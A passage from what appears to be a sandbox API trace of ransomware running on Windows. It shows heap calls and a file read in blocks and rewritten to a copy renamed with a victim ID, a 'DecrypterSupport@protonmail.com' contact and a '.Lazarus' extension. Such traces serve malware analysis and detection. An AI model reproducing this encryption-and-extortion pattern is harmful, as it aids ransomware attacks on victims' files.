Size=0x30) returned 0x4e2d0 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0073.000] AreFileApisANSI () returned 1 [0073.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0073.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0073.000] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c)) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0073.000] AreFileApisANSI () returned 1 [0073.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.000] GetLastError () returned 0x0 [0073.001] SetLastError (dwErrCode=0x0) [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dff8 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0073.001] GetLastError () returned 0x0 [0073.001] SetLastError (dwErrCode=0x0) [0073.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0073.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0073.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0073.001] AreFileApisANSI () returned 1 [0073.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8af48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0073.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0073.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8af48, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0073.001] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0073.002] GetFileType (hFile=0x418) returned 0x1 [0073.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0073.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0073.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0073.002] AreFileApisANSI () returned 1 [0073.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0073.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0073.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0073.002] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.002] GetFileType (hFile=0x410) returned 0x1 [0073.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0073.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.002] GetLastError () returned 0x0 [0073.002] SetLastError (dwErrCode=0x0) [0073.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.003] GetLastError () returned 0x0 [0073.003] SetLastError (dwErrCode=0x0) [0073.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0073.003] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0073.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0073.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0073.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0073.013] GetLastError () returned 0x0 [0073.013] SetLastError (dwErrCode=0x0) [0073.014] GetLastError () returned 0x0 [0073.014] SetLastError (dwErrCode=0x0) [0073.014] GetLastError () returned 0x0 [0073.014] SetLastError (dwErrCode=0x0) [0073.014] GetLastError () returned 0x0 [0073.014] SetLastError (dwErrCode=0x0) [0073.014] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.014] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.015] GetLastError () returned 0x0 [0073.015] SetLastError (dwErrCode=0x0) [0073.016] GetLastError () returned 0x0 [0073.016] SetLastError (dwErrCode=0x0) [0073.016] GetLastError () returned 0x0 [0073.016] SetLastError (dwErrCode=0x0) [0073.016] GetLastError () returned 0x0 [0073.016] SetLastError (dwErrCode=0x0) [0073.016] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.016] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.016] GetLastError () returned 0x0 [0073.016] SetLastError (dwErrCode=0x0) [0073.017] GetLastError () returned 0x0 [0073.017] SetLastError (dwErrCode=0x0) [0073.017] GetLastError () returned 0x0 [0073.017] SetLastError (dwErrCode=0x0) [0073.017] GetLastError () returned 0x0 [0073.017] SetLastError (dwErrCode=0x0) [0073.017] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.017] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.017] GetLastError () returned 0x0 [0073.017] SetLastError (dwErrCode=0x0) [0073.017] GetLastError () returned 0x0 [0073.017] SetLastError (dwErrCode=0x0) [0073.018] GetLastError () returned 0x0 [0073.018] SetLastError (dwErrCode=0x0) [0073.018] GetLastError () returned 0x0 [0073.018] SetLastError (dwErrCode=0x0) [0073.018] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.018] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.018] GetLastError () returned 0x0 [0073.018] SetLastError (dwErrCode=0x0) [0073.018] GetLastError () returned 0x0 [0073.018] SetLastError (dwErrCode=0x0) [0073.018] GetLastError () returned 0x0 [0073.018] SetLastError (dwErrCode=0x0) [0073.019] GetLastError () returned 0x0 [0073.019] SetLastError (dwErrCode=0x0) [0073.019] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.019] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.019] GetLastError () returned 0x0 [0073.019] SetLastError (dwErrCode=0x0) [0073.019] GetLastError () returned 0x0 [0073.019] SetLastError (dwErrCode=0x0) [0073.019] GetLastError () returned 0x0 [0073.019] SetLastError (dwErrCode=0x0) [0073.019] GetLastError () returned 0x0 [0073.020] SetLastError (dwErrCode=0x0) [0073.020] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.020] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.020] GetLastError () returned 0x0 [0073.020] SetLastError (dwErrCode=0x0) [0073.020] GetLastError () returned 0x0 [0073.020] SetLastError (dwErrCode=0x0) [0073.020] GetLastError () returned 0x0 [0073.020] SetLastError (dwErrCode=0x0) [0073.020] GetLastError () returned 0x0 [0073.020] SetLastError (dwErrCode=0x0) [0073.021] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.021] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.021] GetLastError () returned 0x0 [0073.021] SetLastError (dwErrCode=0x0) [0073.021] GetLastError () returned 0x0 [0073.021] SetLastError (dwErrCode=0x0) [0073.021] GetLastError () returned 0x0 [0073.021] SetLastError (dwErrCode=0x0) [0073.021] GetLastError () returned 0x0 [0073.021] SetLastError (dwErrCode=0x0) [0073.021] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.022] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.022] GetLastError () returned 0x0 [0073.022] SetLastError (dwErrCode=0x0) [0073.022] GetLastError () returned 0x0 [0073.022] SetLastError (dwErrCode=0x0) [0073.022] GetLastError () returned 0x0 [0073.022] SetLastError (dwErrCode=0x0) [0073.022] GetLastError () returned 0x0 [0073.022] SetLastError (dwErrCode=0x0) [0073.022] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.023] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.023] GetLastError () returned 0x0 [0073.023] SetLastError (dwErrCode=0x0) [0073.023] GetLastError () returned 0x0 [0073.023] SetLastError (dwErrCode=0x0) [0073.023] GetLastError () returned 0x0 [0073.023] SetLastError (dwErrCode=0x0) [0073.134] GetLastError () returned 0x0 [0073.134] SetLastError (dwErrCode=0x0) [0073.134] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.134] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.134] GetLastError () returned 0x0 [0073.134] SetLastError (dwErrCode=0x0) [0073.134] GetLastError () returned 0x0 [0073.134] SetLastError (dwErrCode=0x0) [0073.135] GetLastError () returned 0x0 [0073.135] SetLastError (dwErrCode=0x0) [0073.135] GetLastError () returned 0x0 [0073.135] SetLastError (dwErrCode=0x0) [0073.135] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.135] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.135] GetLastError () returned 0x0 [0073.135] SetLastError (dwErrCode=0x0) [0073.136] GetLastError () returned 0x0 [0073.136] SetLastError (dwErrCode=0x0) [0073.136] GetLastError () returned 0x0 [0073.136] SetLastError (dwErrCode=0x0) [0073.136] GetLastError () returned 0x0 [0073.136] SetLastError (dwErrCode=0x0) [0073.136] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.136] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.137] GetLastError () returned 0x0 [0073.137] SetLastError (dwErrCode=0x0) [0073.137] GetLastError () returned 0x0 [0073.137] SetLastError (dwErrCode=0x0) [0073.137] GetLastError () returned 0x0 [0073.137] SetLastError (dwErrCode=0x0) [0073.137] GetLastError () returned 0x0 [0073.137] SetLastError (dwErrCode=0x0) [0073.137] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.138] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.138] GetLastError () returned 0x0 [0073.138] SetLastError (dwErrCode=0x0) [0073.138] GetLastError () returned 0x0 [0073.138] SetLastError (dwErrCode=0x0) [0073.138] GetLastError () returned 0x0 [0073.138] SetLastError (dwErrCode=0x0) [0073.138] GetLastError () returned 0x0 [0073.138] SetLastError (dwErrCode=0x0) [0073.139] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.139] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.139] GetLastError () returned 0x0 [0073.139] SetLastError (dwErrCode=0x0) [0073.139] GetLastError () returned 0x0 [0073.139] SetLastError (dwErrCode=0x0) [0073.139] GetLastError () returned 0x0 [0073.139] SetLastError (dwErrCode=0x0) [0073.140] GetLastError () returned 0x0 [0073.140] SetLastError (dwErrCode=0x0) [0073.140] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.140] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.140] GetLastError () returned 0x0 [0073.140] SetLastError (dwErrCode=0x0) [0073.140] GetLastError () returned 0x0 [0073.141] SetLastError (dwErrCode=0x0) [0073.141] GetLastError () returned 0x0 [0073.141] SetLastError (dwErrCode=0x0) [0073.141] GetLastError () returned 0x0 [0073.141] SetLastError (dwErrCode=0x0) [0073.141] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.141] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.141] GetLastError () returned 0x0 [0073.142] SetLastError (dwErrCode=0x0) [0073.142] GetLastError () returned 0x0 [0073.142] SetLastError (dwErrCode=0x0) [0073.142] GetLastError () returned 0x0 [0073.142] SetLastError (dwErrCode=0x0) [0073.142] GetLastError () returned 0x0 [0073.142] SetLastError (dwErrCode=0x0) [0073.142] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.142] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.143] GetLastError () returned 0x0 [0073.143] SetLastError (dwErrCode=0x0) [0073.143] GetLastError () returned 0x0 [0073.143] SetLastError (dwErrCode=0x0) [0073.143] GetLastError () returned 0x0 [0073.143] SetLastError (dwErrCode=0x0) [0073.143] GetLastError () returned 0x0 [0073.143] SetLastError (dwErrCode=0x0) [0073.143] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.144] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.144] GetLastError () returned 0x0 [0073.144] SetLastError (dwErrCode=0x0) [0073.144] GetLastError () returned 0x0 [0073.144] SetLastError (dwErrCode=0x0) [0073.144] GetLastError () returned 0x0 [0073.144] SetLastError (dwErrCode=0x0) [0073.144] GetLastError () returned 0x0 [0073.144] SetLastError (dwErrCode=0x0) [0073.145] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x87c, lpOverlapped=0x0) returned 1 [0073.145] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.145] GetLastError () returned 0x0 [0073.145] SetLastError (dwErrCode=0x0) [0073.145] GetLastError () returned 0x0 [0073.145] SetLastError (dwErrCode=0x0) [0073.145] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0073.145] GetLastError () returned 0x0 [0073.145] SetLastError (dwErrCode=0x0) [0073.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d7b0 [0073.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0073.146] GetLastError () returned 0x0 [0073.146] SetLastError (dwErrCode=0x0) [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0073.146] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x880, lpOverlapped=0x0) returned 1 [0073.146] GetLastError () returned 0x0 [0073.146] SetLastError (dwErrCode=0x0) [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0073.146] GetLastError () returned 0x0 [0073.146] SetLastError (dwErrCode=0x0) [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0073.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0073.146] CloseHandle (hObject=0x418) returned 1 [0073.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0073.150] CloseHandle (hObject=0x410) returned 1 [0073.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0073.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0073.151] AreFileApisANSI () returned 1 [0073.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0073.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0073.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, 